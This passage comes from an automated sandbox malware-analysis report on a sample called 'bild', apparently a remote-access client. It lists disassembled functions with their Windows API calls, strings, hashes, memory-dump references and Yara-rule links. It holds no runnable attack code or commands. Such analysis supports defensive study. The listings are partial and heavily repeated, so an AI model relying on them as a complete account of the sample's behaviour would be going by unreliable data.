                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Librarywsprintf$AddressFreeLoadProc
                                                                                    • String ID: %02x$IPHLPAPI.DLL$SendARP
                                                                                    • API String ID: 435568443-4085816232
                                                                                    • Opcode ID: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                    • Instruction ID: 7d96227945af9bb0c0fa81f266df54215dce15e5fec16fb5673a6d202f8b9dc6
                                                                                    • Opcode Fuzzy Hash: 059c12f073bdf147a91715eca9bcb01dfedc32bce9f3742e1109da8ce792d870
                                                                                    • Instruction Fuzzy Hash: 87216D75E001299BCB14CFA6CD85AEEFBB8FF8D614F550118EC14A3300E635AE05CBA4
                                                                                    Function 11037230 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 11037267
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    • _free.LIBCMT ref: 1103728F
                                                                                    • _strncpy.LIBCMT ref: 110372BB
                                                                                    • _strncpy.LIBCMT ref: 110372F8
                                                                                    • _malloc.LIBCMT ref: 11037332
                                                                                    • _strncpy.LIBCMT ref: 11037343
                                                                                    • _strncpy.LIBCMT ref: 11037383
                                                                                    • _malloc.LIBCMT ref: 110373B6
                                                                                    • _strncpy.LIBCMT ref: 110373CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strncpy$_free_malloc$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 1102513549-0
                                                                                    • Opcode ID: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                    • Instruction ID: 5b3f98012d02b14c7d353fffc6174d10c2b98c6782d71c8fdc241da8d4ec8af6
                                                                                    • Opcode Fuzzy Hash: 49d6ee828f48e7441e9132c75d4151723e4ca8f50ebe71d103648970c0ae2386
                                                                                    • Instruction Fuzzy Hash: 5A5152B5D04225AFDB20CF74CD84BCAFBECAF15348F004595998997240EBB5AA94CFE1
                                                                                    Function 1100D390 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                    • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                    • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                    • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                    • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                    • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                    • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                    • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                    • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                    • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                    • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                    • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                    Function 11113150 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                    • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                    • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                    • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                    • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                    • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Select$Stock$Clip$Brush
                                                                                    • String ID:
                                                                                    • API String ID: 2690518013-0
                                                                                    • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                    • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                    • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                    • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                    Function 110B73D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B026C
                                                                                      • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B029D
                                                                                      • Part of subcall function 110B0AD0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0AD6
                                                                                      • Part of subcall function 110B0AD0: timeGetTime.WINMM(111F00F8,111E5C98,?), ref: 110B0BA5
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B743D
                                                                                    • GetDC.USER32(00000000), ref: 110B7481
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B748C
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7497
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110B74A3
                                                                                      • Part of subcall function 110B3090: SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                      • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                      • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                      • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                      • Part of subcall function 110B3090: WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                      • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
                                                                                    • String ID: TraceScrape$_debug
                                                                                    • API String ID: 2936113293-4091781993
                                                                                    • Opcode ID: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
                                                                                    • Instruction ID: 6857b597a808110f0f281143ea82df92f461d6df4c4e0b5b1330fe4484300919
                                                                                    • Opcode Fuzzy Hash: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
                                                                                    • Instruction Fuzzy Hash: E941A679E042469BDB05CFB4C8D4FAFBBB5EB84704F1941ADE905AB285DA70EC04C7A4
                                                                                    Function 11027030 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                    • TranslateMessage.USER32(?), ref: 11027081
                                                                                    • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                    • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchSleepTranslate
                                                                                    • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                    • API String ID: 3237117195-3850961587
                                                                                    • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                    • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                    • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                    • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                    Function 110B90A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                    • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                    • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                    • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                    • API String ID: 1092798621-1973987134
                                                                                    • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                    • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                    • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                    • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                    Function 1112B340 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                      • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                    • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                    • _calloc.LIBCMT ref: 1112B3AD
                                                                                    • _free.LIBCMT ref: 1112B44B
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                    • String ID: ntohl$ws2_32.dll
                                                                                    • API String ID: 2881363997-4165132517
                                                                                    • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                    • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                    • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                    • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                    Function 1100F3D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3FD
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F420
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 1100F4A4
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100F4B2
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4C5
                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F4DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                    • String ID: bad cast
                                                                                    • API String ID: 2427920155-3145022300
                                                                                    • Opcode ID: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                    • Instruction ID: 370362221ca7244b6b9d163162d4a533615f3e9481550f6b861c2319f727a088
                                                                                    • Opcode Fuzzy Hash: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                    • Instruction Fuzzy Hash: 1D31A07AD042169FDB11DF94C890BAEF7B8FB04368F51426DEC61A7280DB71AD04CB92
                                                                                    Function 11105500 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 11105531
                                                                                    • EnterCriticalSection.KERNEL32 ref: 11105548
                                                                                    • GetTickCount.KERNEL32 ref: 1110554E
                                                                                    • GetTickCount.KERNEL32 ref: 111055EB
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C), ref: 111055F8
                                                                                    Strings
                                                                                    • Warning. simap lock held for %d ms, xrefs: 11105609
                                                                                    • Warning. took %d ms to get simap lock, xrefs: 1110555F
                                                                                    Memory Dump Source
